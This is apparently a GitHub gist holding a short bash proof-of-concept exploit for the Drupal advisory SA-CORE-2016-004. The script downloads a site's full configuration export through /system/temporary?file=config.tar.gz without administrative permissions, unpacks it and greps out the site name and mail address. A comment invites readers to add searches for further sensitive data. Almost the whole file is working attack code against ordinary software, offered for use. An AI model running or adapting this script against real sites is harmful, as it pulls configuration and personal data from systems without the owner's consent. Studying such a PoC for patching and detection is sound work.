Created
November 10, 2016 14:09
-
-
Save qkaiser/6d24e70dcd89b408c621fe1ac045c3b8 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # PoC for SA-CORE-2016-004 | |
| # Full config export can be downloaded without administrative permissions | |
| # | |
| # The idea is to grep for sensitive information within the exported | |
| # config files. Feel free to add your own findings :) | |
| # | |
| ############################################################################### | |
| if [ $# -ne 1 ]; then | |
| echo "Usage: $0 URL" | |
| else | |
| URL=${1%/} | |
| ARCHIVE=`mktemp` | |
| rm $ARCHIVE | |
| mkdir $ARCHIVE | |
| curl -s "$URL/system/temporary?file=config.tar.gz" > "$ARCHIVE\.tar.gz" | |
| tar xzvf "$ARCHIVE\.tar.gz" -C $ARCHIVE >/dev/null | |
| grep name "$ARCHIVE/system.site.yml" | |
| grep mail "$ARCHIVE/system.site.yml" | |
| rm -rf "$ARCHIVE" | |
| rm "$ARCHIVE\.tar.gz" | |
| fi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment